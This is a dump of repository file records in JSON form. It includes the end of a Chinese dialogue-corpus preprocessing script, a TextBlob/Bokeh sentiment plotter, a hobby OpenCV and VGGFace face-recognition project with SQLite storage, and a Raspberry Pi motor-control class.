values:\n sentence = jieba.lcut(reg.sub(\"\",value))\n #每句话的结束,添加</EOS>标记\n sentence = sentence[:max_sentence_length] + [eos]\n sentences.append(sentence)\n data.append(sentences)\n '''生成字典和句子索引'''\n words_dict = {} #统计单词的词频\n def update(word):\n words_dict[word] = words_dict.get(word, 0) + 1\n #更新词典\n {update(word) for sentences in data for sentence in sentences for word in sentence}\n #按词频从高到低排序\n word_nums_list = sorted([(num, word) for word, num in words_dict.items()], reverse=True)\n #词典最大长度: max_voc_length 最小单词词频: min_freq\n words = [word[1] for word in word_nums_list[:max_voc_length] if word[0] >= min_freq]\n words = [unknown, padding, sos] + words\n word2ix = {word: ix for ix, word in enumerate(words)}\n ix2word = {ix: word for word, ix in word2ix.items()}\n #使用构建的词典对原对话语料进行编码\n ix_corpus = [[[word2ix.get(word, word2ix.get(unknown)) for word in sentence] for sentence in item] for item in data]\n clean_data = {\n 'corpus': ix_corpus, \n 'word2ix': word2ix,\n 'ix2word': ix2word,\n 'unknown' : '</UNK>',\n 'eos' : '</EOS>',\n 'sos' : '</SOS>',\n 'padding': '</PAD>',\n }\n torch.save(clean_data, save_path)\n return words_dict\nif __name__ == \"__main__\":\n datapreparation()\n" } ]
22
Mytholody/sentimentPlotter
https://github.com/Mytholody/sentimentPlotter
b78e52070d8915dbac15235638ce6fb6de19bbbf
aee443559896dd08a3c19832bb2f54c7ac958d22
8719e7e12e3e51aa459775dd318304df01ce6672
refs/heads/master
2020-06-02T17:50:39.304696
2019-06-10T22:42:57
2019-06-10T22:42:57
191,255,107
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8224852085113525, "alphanum_fraction": 0.8224852085113525, "avg_line_length": 41.25, "blob_id": "aeb8d8e0d5f8dfece1881867eac17b9ba62d367d", "content_id": "e3aef2f0365adee7d3612f131ad693b6290dd0f1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "permissive", "max_line_length": 103, "num_lines": 4, "path": "/README.md", "repo_name": "Mytholody/sentimentPlotter", "src_encoding": "UTF-8", "text": "# sentimentPlotter\nTakes a story text as input, attempts to rank sentinces and display the sentiment of the top sentences.\n\nRequires Bokeh and textblob python libraries\n" }, { "alpha_fraction": 0.6464646458625793, "alphanum_fraction": 0.6602020263671875, "avg_line_length": 24.515464782714844, "blob_id": "cca50b598616a815ba379a039f6d0ca0c22b3b36", "content_id": "f11cf0bf5ba0773f25ce275a8ce603216ad64e6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "permissive", "max_line_length": 119, "num_lines": 97, "path": "/plotSentiment.py", "repo_name": "Mytholody/sentimentPlotter", "src_encoding": "UTF-8", "text": "# @author Kyle\n# Copyright Kyle 2019\n# Generates a plot of ups and downs in a given story structure\n# Inspired by https://github.com/IndicoDataSolutions/plotlines\n# (see above for use of a trained sentiment api and other nifty things, including an awesome description of everything)\n#bokeh code based on https://bokeh.pydata.org/en/1.0.0/docs/user_guide/examples/tools_hover_tooltip_formatting.html\nimport numpy as np\n\nfrom bokeh.io import output_file, show\nfrom bokeh.models import ColumnDataSource, HoverTool\nfrom bokeh.plotting import figure\n\nfrom textblob import TextBlob\nimport heapq\n\nfileName = \"t1.txt\"\n\nfile = open(fileName)\ntext = TextBlob(file.read())\nword_counts = text.word_counts\n\nvals = []\nnums = []\nsents = []\ni = 0\n\nfor thing in text.sentences:\n sents.append(thing)\n vals.append(thing.sentiment.polarity)\n nums.append(i)\n i = i + 1\n\n# Thanks to ideas from https://medium.com/incedge/text-summarization-96079bf23e83\nsentence_scores = {}\nfor sent in sents:\n count = 0\n words = sent.words\n for word in words:\n if word in word_counts:\n count += word_counts[word]\n sentence_scores[sent] = count\n\n\nsummary_sent = heapq.nlargest(15, sentence_scores, key=sentence_scores.get)\n\nsumm = []\nfor sent in summary_sent:\n summ.append(sents.index(sent))\n summ.sort()\n\nvals = []\nnums = []\n\nfor thing in summ:\n vals.append(sents[thing].sentiment.polarity)\n nums.append(thing)\n print sents[thing]\n\nsent_list = []\n\nfor thing in nums:\n sent_list.append(str(sents[thing]))\n\noutput_file(\"sentiment_quantifier.html\")\n\nsource = ColumnDataSource(data={\n 'numsent' : nums,\n 'sent val' : vals,\n 'sent list' : sent_list,\n })\n\np = figure(plot_height=250, x_axis_type=\"linear\", tools=\"\", toolbar_location=None,\n title=\"Sentiment Quantifier\", sizing_mode=\"scale_width\")\np.background_fill_color=\"#f5f5f5\"\np.grid.grid_line_color=\"white\"\np.xaxis.axis_label = 'Sentence Number'\np.yaxis.axis_label = 'Sentiment Polarity'\np.axis.axis_line_color = None\n\np.line(x='numsent', y='sent val', line_width=2, color='#ebbd5b', source=source)\n\np.add_tools(HoverTool(\n tooltips=[\n ( 'Sentence Number :', '@numsent{%1.4f}' ),\n ( 'Sentiment Polarity:', '@{sent val}{%1.4f}' ),\n ( 'Sentence :', '@{sent list}{%s}' ),\n ],\n\n formatters={\n 'numsent' : 'printf',\n 'sent val' : 'printf',\n 'sent list' : 'printf',\n },\n mode='vline'\n))\n\nshow(p)\n" } ]
2
IqbalLx/face-verifification
https://github.com/IqbalLx/face-verifification
79e2942523b26e48d2fa4e5ab957ab541b2bb396
4a9190638433eb99d5e1e0373c616bed1a87fca3
3baf0aefb845741ddd71fe57a571a8d298106f98
refs/heads/main
2023-02-10T21:09:24.185175
2021-01-01T01:06:48
2021-01-01T01:06:48
325,940,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5916542410850525, "alphanum_fraction": 0.5931445360183716, "avg_line_length": 23.83333396911621, "blob_id": "03104de9ab16c09d3a96275edb9c8249829a7096", "content_id": "085fa2d17e9688dd6c55943291fec9537874ef0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1342, "license_type": "no_license", "max_line_length": 72, "num_lines": 54, "path": "/src/database.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import sqlite3 as sqlite\nfrom sqlite3 import Error\n\nimport os\nimport glob\n\nimport config\n\n\"\"\"\nFile untuk mengatur seluruh komunikasi script \ndengan database menggunakan SQLite\n\"\"\"\n\nclass Database():\n def __init__(self):\n self.conn = sqlite.connect(config.DB_PATH)\n self.curs = self.conn.cursor()\n\n def create_table(self):\n self.curs.execute(config.CREATE_TABLE_QUERY)\n\n def show(self):\n self.curs.execute(config.SHOW_QUERY)\n data = self.curs.fetchall()\n \n return data\n \n def insert_user(self, ids, name):\n self.curs.execute(config.INSERT_DATA_QUERY, (ids, name))\n self.conn.commit()\n \n def update_name(self, ids, new_name):\n self.curs.execute(config.UPDATE_DATA_QUERY, (new_name, ids))\n self.conn.commit()\n\n def get_name(self, ids):\n try:\n self.curs.execute(config.SELECT_NAME_QUERY, (ids,))\n name = self.curs.fetchone()\n except Error:\n name = \"Not Found\"\n \n return name\n \n def delete(self, ids):\n self.curs.execute(config.DELETE_DATA_QUERY, (ids,))\n self.conn.commit()\n\n datapaths = glob.glob(config.DATA_ROOT+\"/people.\"+str(ids)+\"*\")\n for path in datapaths:\n os.remove(path)\n \n def close(self):\n self.conn.close()\n\n" }, { "alpha_fraction": 0.6224899888038635, "alphanum_fraction": 0.6278446912765503, "avg_line_length": 34.595237731933594, "blob_id": "1e5c8d6ab6c5fad9accc96aeeb1ccc57c9c57d0a", "content_id": "f66f8b626054e38d14180599b3a35dd94b554250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1494, "license_type": "no_license", "max_line_length": 88, "num_lines": 42, "path": "/src/model.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\nimport os\nimport numpy as np\n\nimport config\nimport utils\n\n\nclass Model:\n def __init__(self):\n self.recognizer = cv2.face.LBPHFaceRecognizer_create()\n\n def train(self):\n images = os.listdir(\n config.DATA_ROOT\n ) # list semua path data wajah pada folder train data\n\n print(\"[INFO] Preparing Training Data...\")\n image_arrays = [] # Containes semua array data wajah\n image_ids = [] # Container semua ID data wajah\n for i, image_path in enumerate(images): # Looping semua path data wajah\n splitted_path = image_path.split(\".\")\n # print(splitted_path)\n image_id = int(splitted_path[1]) # Ambil ID data wajah\n\n image = cv2.imread(os.path.join(config.DATA_ROOT, image_path))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n image_array = np.array(image, \"uint8\") # Ambil array data wajah\n\n image_arrays.append(image_array) # Store array data wajah ke list/container\n image_ids.append(image_id) # Store ID data wajah ke list/container\n utils.pretty_print(len(images), i)\n\n print(\"[INFO] Training Start!\")\n self.recognizer.train(image_arrays, np.array(image_ids)) # Train recognizer\n self.recognizer.save(config.MODEL_PTH) # Save model recognizer\n print(\"[INFO] TRAIN RECOGNIZER SUCCESS!\")\n\n def load(self):\n self.recognizer.read(config.MODEL_PTH)\n return self.recognizer" }, { "alpha_fraction": 0.5336848497390747, "alphanum_fraction": 0.5430579781532288, "avg_line_length": 37.79545593261719, "blob_id": "e87981283b5d961768db7a0157a23ee0c96825ba", "content_id": "9716ead28fc15a1899da498204929b1715dd5aa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1707, "license_type": "no_license", "max_line_length": 143, "num_lines": 44, "path": "/src/recog_face.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\n\nimport model\nimport database\nimport config\nimport utils\n\n\n\"\"\"\nFile untuk melakukan proses Face Recognition. Wajah diukur jaraknya\ndengan yang sudah ada pada database. Nama yang berasosiasi dengan\njarak wajah terdekat akan dikembalikan hasilnya\n\"\"\"\n\nmodel = model.Model()\nrecognizer = model.load()\n\ndb = database.Database()\n\nface_cascade = cv2.CascadeClassifier(config.FACE_CASCADE_PTH)\n\ncam = cv2.VideoCapture(1) # Akses Kamera\nwhile True:\n ret, frame = cam.read() # Membaca setiap frame dari stream kamera \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Mengubah mode BGR ke GRAY (hitam putih)\n \n # Proses pencarian wajah \n faces = face_cascade.detectMultiScale(gray, 1.3, 3) # <cascade_file>.detectMultiScale(<frame>, <scale_factor>, <min_neighbors>)\n for x, y, w, h in faces: # Looping semua wajah yang terdeteksi\n roi_gray = gray[y:y+h, x:x+w]\n ids, dist = recognizer.predict(roi_gray)\n name = db.get_name(ids)[0] # Prediksi wajah siapoa\n frame = utils.draw(frame.copy(), x, y, w, h, ids, name, dist)\n\n \n cv2.imshow('Face Recognition Video', frame) # Jendela untuk menampilkan hasil\n \n if cv2.waitKey(1) & 0xff == ord('x'): # Exit dengan tombol x\n break\n\ncam.release() # Menyudahi akses kamera\ncv2.destroyAllWindows() # Menutup jendela\n\ndb.close()\n" }, { "alpha_fraction": 0.6287397742271423, "alphanum_fraction": 0.6563916802406311, "avg_line_length": 27.649351119995117, "blob_id": "69bcbed589e0ad23a2a6aaf0b7aa43f7fc356af2", "content_id": "813f0d314957b7f4b8dcd0fbe2418619471a9ae1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2206, "license_type": "no_license", "max_line_length": 98, "num_lines": 77, "path": "/app.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\nfrom numpy import expand_dims, zeros\nfrom scipy.spatial.distance import cosine\n\nimport tensorflow as tf\n# enabling GPU - uncomment below to run on non-colab with GPU machine\nphysical_devices = tf.config.experimental.list_physical_devices(\"GPU\")\ntf.config.experimental.set_memory_growth(physical_devices[0], enable=True)\n\nfrom keras_vggface.vggface import VGGFace\nfrom keras_vggface.utils import preprocess_input\n\n\ndef extract_face(image):\n face_cascade = cv2.CascadeClassifier(\"src/CascadeFile/face-detect.xml\")\n\n image = image.copy()\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n \n face_image = zeros((224, 224, 3), dtype='float64')\n try:\n face_coords = face_cascade.detectMultiScale(gray, 1.3, 3)[0]\n\n x, y, w, h = face_coords\n face_image = image[y:y+h, x:x+w]\n\n face_image = cv2.resize(face_image, (224, 224), interpolation=cv2.INTER_LINEAR)\n face_image = face_image.astype('float64')\n except:\n pass\n \n return face_image\n\n\ndef get_embedding(model, face_image):\n face_image = preprocess_input(face_image, version=2)\n face_image = expand_dims(face_image, axis=0)\n embedding = model.predict(face_image)\n return embedding\n\n\ndef is_match(first_embedding, second_embedding, thresh=0.4):\n matchness = cosine(first_embedding, second_embedding)\n if matchness <= thresh:\n print(\"Match\")\n else:\n print(\"Not Match\")\n \n print(f\"Matchness Cosine Score: {matchness}\")\n\ndef main():\n model = VGGFace(model='resnet50', include_top=False, input_shape=(224, 224, 3), pooling='avg')\n\n first_image = get_embedding(model, extract_face(cv2.imread(\"src/data/ronaldo.jpg\")))\n \n cam = cv2.VideoCapture(0)\n\n while 1:\n _, frame = cam.read()\n frame = cv2.resize(frame, (640, 480))\n\n second_image = get_embedding(model, extract_face(frame))\n is_match(first_image, second_image)\n \n cv2.imshow(\"Preview\", frame)\n\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\n cam.release()\n cv2.destroyAllWindows()\n\n is_match(first_image, second_image)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5021321773529053, "alphanum_fraction": 0.5138592720031738, "avg_line_length": 18.93617057800293, "blob_id": "ebc94848c16c9ccbb6e8c03512d66ee3bc840bb5", "content_id": "92664e1faa27aa5d74afa16988aca9aeb48f742d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 938, "license_type": "no_license", "max_line_length": 50, "num_lines": 47, "path": "/src/explore_db.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import database\n\n\"\"\"\nFile untuk manajemen database\n\"\"\"\n\ndb = database.Database()\n\ndef show():\n datas = db.show()\n print(\"\\nID | NAME\")\n print('-'*10)\n for ids, name in datas:\n print(str(ids)+\" | \"+name)\n\nMENU = \"\"\"SELECT MENU\n[1] Look All Data\n[2] Update Existing Data\n[3] Delete Data\n[4] Quit\n \"\"\"\n\nwhile 1:\n print(MENU)\n num_menu = int(input(\"Select: \"))\n\n if num_menu == 1:\n show()\n elif num_menu == 2:\n ids = int(input(\"\\nInsert ID: \"))\n new_name = input(\"Insert New Name: \")\n db.update_name(ids, new_name)\n print(\"\\nDB Updated!\")\n show()\n elif num_menu == 3:\n ids = int(input(\"\\nInsert ID: \"))\n db.delete(ids)\n print(\"\\nDB Updated!\")\n show()\n elif num_menu == 4:\n db.close()\n break\n\n continues = input(\"\\nAnother Command (y/n): \")\n if continues.lower() == 'n':\n db.close()\n break\n\n" }, { "alpha_fraction": 0.7832860946655273, "alphanum_fraction": 0.7870632410049438, "avg_line_length": 59.5428581237793, "blob_id": "22d1e4b1e87ebc5f53940266c077fcdfcd096db3", "content_id": "6d3dbc340276a7bdae2d4750666023315d780b72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2118, "license_type": "no_license", "max_line_length": 101, "num_lines": 35, "path": "/src/README.txt", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "Quickstart:\n- Untuk melakukan input wajah baru gunakan command \"python input_face.py\" di dalam folder ini\n - Tekan tombol 'c' untuk melakukan capture data wajah sebanyak 10x\n - Tekan tombol 't' untuk memulai proses training agar data wajah dikenali\n - Terakhit, tekan tombol 'x' saat proses sudah selesai untuk keluar program\n\n- Untuk mencoba hasil training model, gunakan command \"python recog_face.py\"\n - Maka jendela baru akan tampil dan menampilkan Face Recognition terhadap wajah yang\n terdeteksi di kamera\n - Proses Recognition menggunakan metode LBPH yang mengukur seberapa dekat jarak wajah saat ini\n dengan wajah yang sudah disimpan di database, semakin dekat jaraknya (angka yang muncul kecil) \n maka semakin bagus.\n - Konfigurasi saat ini jika jarak yang dihitung lebih kecil dari 50 maka ditampilkan. Sementara\n yang lebih akan dibuang dan ditampilkan sebagai Unknown.\n \nPenjelasan Detail:\n- Metode deteksi wajah menggunakan algoritmal Viola-Jones\n- Metode rekognisi wajah menggunakan metode LBPH (Local Binary Pattern Histogram)\n- Database yang digunakan untuk menampung ID dan Nama adalah SQLite3\n- Library yang dipakai antara lain: OpenCV, NumPy, dan Sqlite3\n\n- Script input_face.py\n Dalam script ini dilakukan proses deteksi wajah, ketika user menekan tombol 'c' untuk \n capture wajah maka wajah saat ini (yang terdeteksi) akan disimpan dalam folder \"data\".\n Setelah 10 wajah berhasil disimpan maka dilakukan proses \"fitting\" atau training agar\n model dapat mengenali fitur wajah tersebut berasosiasi dengan ID yang mana.\n Setelah proses training selesai maka akan dihasilkan file \"recognizer.yml\" pada \n folder \"model\". \n Penjelasan script lebih lanjut sebagian besar sama dengan video yang ada di YouTube saya \n\n- Script face_recog.py\n Dalam script ini dilakukan proses rekognisi wajah dengan mengukur jarak histogram data wajah\n saat ini dengan yang sudah ada di model. Seluruh proses kurang lebih sama dengan video yang\n ada di YouTube saya, bedanya saat ini adalah proses penampilan nama berdasarkan nama yang telah \n disimpan di dalam database." }, { "alpha_fraction": 0.5211864113807678, "alphanum_fraction": 0.5635592937469482, "avg_line_length": 23.413793563842773, "blob_id": "38e8eba9eeda587dfd45b9ba471824b2b7a1f0d7", "content_id": "6ecdfce826ae5c25784f8c25d8ae6a02e9b0c775", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 708, "license_type": "no_license", "max_line_length": 75, "num_lines": 29, "path": "/scratch.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\n\ndef extract_face(image):\n face_cascade = cv2.CascadeClassifier(\"src/CascadeFile/face-detect.xml\")\n\n image = image.copy()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n face_coords = face_cascade.detectMultiScale(gray, 1.3, 3)\n \n return face_coords\n\nif __name__ == \"__main__\":\n cam = cv2.VideoCapture(0)\n\n while 1:\n _, frame = cam.read()\n frame = cv2.resize(frame, (640, 480))\n\n for x, y, w, h in extract_face(frame):\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n \n cv2.imshow(\"Preview\", frame)\n\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\n cam.release()\n cv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.446988970041275, "alphanum_fraction": 0.49194231629371643, "avg_line_length": 24.085105895996094, "blob_id": "dcb80bbc0488ff97db47e17239486ac7853e01bb", "content_id": "44f9bb963379562c2b9d3953d95f6c4470c5a72c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 90, "num_lines": 47, "path": "/src/utils.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\n\nimport config\n\n\ndef pretty_print(raw_total, raw_current, custom_processing=\"Processing ...\"):\n # base 20 ####################\n total = raw_total - 1\n current = raw_current + 1\n size = int(20 * (raw_current / total))\n remain = 20 - size\n if remain > 0:\n return print(\n f\"\\r {current}/{raw_total} [\",\n \"#\" * size,\n \" \" * remain,\n f\"] {custom_processing}\",\n end=\"\",\n )\n else:\n return print(f\"\\n\\r {current}/{raw_total} [\", \"#\" * size, \"] Done!\\n\", end=\"\")\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef draw(frame, x, y, w, h, ids, name, dist):\n color = (200, 255, 0)\n\n if dist > config.THRESHOLD:\n name = \"Unknown\"\n dist = 0\n\n color = (200, 0, 255)\n\n cv2.rectangle(\n frame, (x, y), (x + w, y + h), color, 3\n ) # Gambar box untuk setiap wajah\n \n text = f\"{name} {round(dist, 2)}\"\n text_size = cv2.getTextSize(text, font, 0.5, 2)[0]\n cv2.rectangle(frame, (x - 3, y), (x + text_size[0], y - text_size[1] - 15), color, -1)\n\n cv2.putText(\n frame, text, (x, y - 10), font, 0.5, (50, 50, 50), 2,\n )\n return frame\n" }, { "alpha_fraction": 0.5583623647689819, "alphanum_fraction": 0.5618466734886169, "avg_line_length": 23.4255313873291, "blob_id": "ff112ce4fe1296ba2dff7068997f823351340307", "content_id": "daf47c71fd2a9acb5898e89397b7753e4a311bd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1148, "license_type": "no_license", "max_line_length": 67, "num_lines": 47, "path": "/src/config.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import os\n\n\"\"\"\nIni adalah file untuk mengatur konfigurasi seluruh script\n\"\"\"\n\n\n# Cascade file configuration\nCASCADE_ROOT = 'CascadeFile'\nFACE_CASCADE = 'face-detect.xml'\nFACE_CASCADE_PTH = os.path.join(CASCADE_ROOT, FACE_CASCADE)\n\n# Recognizer configuration\nMODEL_ROOT = 'model'\nMODEL_NAME = 'recognizer.yml'\nMODEL_PTH = os.path.join(MODEL_ROOT, MODEL_NAME)\nTHRESHOLD = 70\n\n# Data configuration\nDATA_ROOT = 'data'\nTOTAL_DATA = 10\n\n# DB Configuration\nDB_ROOT = 'database'\nDB_NAME = 'database.db'\nDB_PATH = os.path.join(DB_ROOT, DB_NAME)\n\nCREATE_TABLE_QUERY = \"\"\"CREATE TABLE IF NOT EXISTS Data (\n id integer NOT NULL,\n name text NOT NULL\n );\"\"\"\n\nSHOW_QUERY = \"\"\"SELECT * FROM Data\"\"\"\n\n\nINSERT_DATA_QUERY = \"\"\"INSERT INTO Data (id, name) VALUES (?, ?)\"\"\"\n\nUPDATE_DATA_QUERY = \"\"\"UPDATE Data\n SET name = ?\n WHERE id = ?\n \"\"\"\n\nSELECT_NAME_QUERY = \"\"\"SELECT name\n FROM Data \n WHERE id = ?\n \"\"\"\nDELETE_DATA_QUERY = \"\"\"DELETE FROM Data WHERE id = ?\"\"\"\n" } ]
9
joelhaasnoot/spoortkaarthopper-tools
https://github.com/joelhaasnoot/spoortkaarthopper-tools
c0c7e8c2fdd18636276f29fa8c370acdcfc582e0
225a1044594da507e1bdc2bc32126b22b2ea483f
c3c0a442207746dc769da4e529ae85d91ae23d08
refs/heads/master
2021-01-15T23:02:19.500288
2014-01-04T13:55:07
2014-01-04T13:55:07
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5258393287658691, "alphanum_fraction": 0.5548849701881409, "avg_line_length": 25.510000228881836, "blob_id": "a8f9822eb79e3f88cd677803b5f3b43cf7a330a6", "content_id": "6a1c7ba0cc671ad09aed015b010de7fc8a389907", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2651, "license_type": "permissive", "max_line_length": 105, "num_lines": 100, "path": "/list_to_map.py", "repo_name": "joelhaasnoot/spoortkaarthopper-tools", "src_encoding": "UTF-8", "text": "\"\"\"\nConvert a list of to/from coordinates and a path to a map of each individual path and an overview\nRequires pygmaps\n\"\"\"\nimport csv\n\nimport sys\nimport pygmaps\n\nclass MapMaker:\n output_dir = \"\"\n\n def __init__(self, output):\n self.output_dir = output\n\n def make_map(self, a, b, point_a, point_b, path):\n # Add to a map and write it out\n path_map = pygmaps.maps(point_a[0], point_a[1], 12)\n path_map.addpoint(point_a[0], point_a[1], \"#0000FF\")\n path_map.addpoint(point_b[0], point_b[1], \"#0000FF\")\n\n # Convert the list\n path_map.addpath(path, \"#FF0000\")\n\n path_map.draw('%s/%s-%s.html' % (self.output_dir, a.capitalize(), b.capitalize()));\n\n\ndef decode_line(encoded):\n \"\"\"\n Decodes a polyline that was encoded using the Google Maps method.\n\n See http://code.google.com/apis/maps/documentation/polylinealgorithm.html\n\n This is a straightforward Python port of Mark McClure's JavaScript polyline decoder\n (http://facstaff.unca.edu/mcmcclur/GoogleMaps/EncodePolyline/decode.js)\n and Peter Chng's PHP polyline decode\n (http://unitstep.net/blog/2008/08/02/decoding-google-maps-encoded-polylines-using-php/)\n \"\"\"\n\n encoded_len = len(encoded)\n index = 0\n array = []\n lat = 0\n lng = 0\n\n while index < encoded_len:\n\n b = 0\n shift = 0\n result = 0\n\n while True:\n b = ord(encoded[index]) - 63\n index = index + 1\n result |= (b & 0x1f) << shift\n shift += 5\n if b < 0x20:\n break\n\n dlat = ~(result >> 1) if result & 1 else result >> 1\n lat += dlat\n\n shift = 0\n result = 0\n\n while True:\n b = ord(encoded[index]) - 63\n index = index + 1\n result |= (b & 0x1f) << shift\n shift += 5\n if b < 0x20:\n break\n\n dlng = ~(result >> 1) if result & 1 else result >> 1\n lng += dlng\n\n array.append((lat * 1e-5, lng * 1e-5))\n\n return array\n\n\ndef run():\n INPUT_FILE = sys.argv[1]\n OUTPUT_DIR = sys.argv[2]\n\n paths = []\n\n m = MapMaker(OUTPUT_DIR)\n with open(INPUT_FILE, 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for row in reader:\n path = decode_line(row[2])\n path_tup = (row[0], row[1], path)\n paths.append(path_tup)\n m.make_map(row[0], row[1], path[0], path[-1], path)\n #total_map.addpath(list(thelist), \"#FF0000\") # Also add to our global map with all the pieces\n\n\nif __name__ == \"__main__\":\n run()\n" }, { "alpha_fraction": 0.6270871758460999, "alphanum_fraction": 0.6326530575752258, "avg_line_length": 30.52941131591797, "blob_id": "79cc350d370aadd5dfa7fd4e282278a198bf7aa5", "content_id": "8a856e6a186cc5cd38b50b5a81fac7addf92f6cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "permissive", "max_line_length": 89, "num_lines": 17, "path": "/list_to_geojson.py", "repo_name": "joelhaasnoot/spoortkaarthopper-tools", "src_encoding": "UTF-8", "text": "\"\"\"\nThis tool converts output.csv into a GeoJSON blob with each line being a feature\n\"\"\"\nfrom polyline import *\nimport json\n\nfeatures = []\nwith open('output.csv', 'r') as input_file:\n\tfor line in input_file.readlines():\n\t\trow = line.split(',')\n\n\t\tobj = { 'type' : 'Feature', 'geometry' : {'type' : 'LineString', 'coordinates' : [] }, \n\t\t\t'properties' : {'from' : row[0], 'to' : row[1] } }\n\t\tobj['geometry']['coordinates'] = decode(row[2])\n\t\tfeatures.append(obj)\n\nprint json.dumps({'type' : 'FeatureCollection', 'features' : features })\n\t\t\n" } ]
2
Maxim323/GoogleForms-Bot
https://github.com/Maxim323/GoogleForms-Bot
963907db02778c073f49ebfc37923475df2f6634
adf85d4f6d937a9faefa9582d6870bd04b75cdf3
db89dcb96c312e90581008d1347af2646c780878
refs/heads/main
2023-07-22T16:45:49.684917
2021-09-05T11:45:42
2021-09-05T11:45:42
367,999,120
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5989491939544678, "alphanum_fraction": 0.7005254030227661, "avg_line_length": 25.190475463867188, "blob_id": "c01fd7bb7d1cb663f6b8bb6b210c788c1be96b01", "content_id": "413ded8b3c79b88b8029dcdea9fcc14621a04b80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 571, "license_type": "no_license", "max_line_length": 195, "num_lines": 21, "path": "/exec.py", "repo_name": "Maxim323/GoogleForms-Bot", "src_encoding": "UTF-8", "text": "import re\r\nimport time\r\nstart_time = time.time()\r\n\r\nDemo = 'https://docs.google.com/forms/d/e/1FAIpQLSfVAfLRrBPkhP55_1jrP9IrPys99BjayAzQ_G_EM2bJ0iNd_w/viewform?usp=pp_url&entry.2098263493=2&entry.1497167764=2&entry.1495890103=2&entry.1012177044=2'\r\n\r\n\r\n\r\nstart = Demo[:116]\r\nstart = start.replace('viewform','formResponse')\r\n\r\nresult = re.search('entry(.*)&',Demo)\r\nresult = result.group(1)\r\nresult = result.replace('=2','=%s')\r\nfinal = start + result\r\n\r\n\r\nprint(start)\r\nprint(result)\r\nprint(final)\r\nprint(\"Time while running: %s seconds.\" % (time.time() - start_time))\r\n" } ]
1
kristenkoyanagi/ConfigureESC
https://github.com/kristenkoyanagi/ConfigureESC
b6f1e8866d6128cf2f1ed5a00d43ef0697789be4
6f05dbf05f320db73d687e0e77aa6e1dba603af2
435b02753a847c5c3b96b2892a43eacb63323c3d
refs/heads/master
2017-12-31T05:49:16.129996
2016-12-08T02:10:34
2016-12-08T02:10:34
72,059,907
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5097744464874268, "alphanum_fraction": 0.544360876083374, "avg_line_length": 19.15151596069336, "blob_id": "abda2b8ac3f6b6db278efdcb3100c2aad2824bd6", "content_id": "170db50873781130f55a08c2f850813d8358470e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "no_license", "max_line_length": 52, "num_lines": 33, "path": "/Motor.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import pigpio\nimport time\n\nclass Motor(object):\n global frequency, speed\n NeutralBand = [0,0] #in Duty Cycle\n IdleReverse = [0,0]\n IdleForward = [0,0]\n pin = 0\n pi = pigpio.pi()\n frequency = 50\n\n\n def __init__(self, NB, IR, IF, pin, pi):\n \n \n self.NeutralBand = NB\n self.IdleReverse = IR\n self.IdleForward = IF\n self.pin = pin\n self.pi = pi\n\n self.frequency = 50\n self.speed = 1.5*frequency\n\n pi.hardware_PWM(pin, frequency, speed*10000)\n \n \n \n \n def ChangeSpeed(speed):\n self.speed = speed\n pi.hardware_PWM(pin, frequency, speed*10000)\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 14.5, "blob_id": "864fe4108ceddeba796f9b44de43801c93c89a07", "content_id": "8e5dea5fc71e0b06e4d72bffc8f36434574be78a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31, 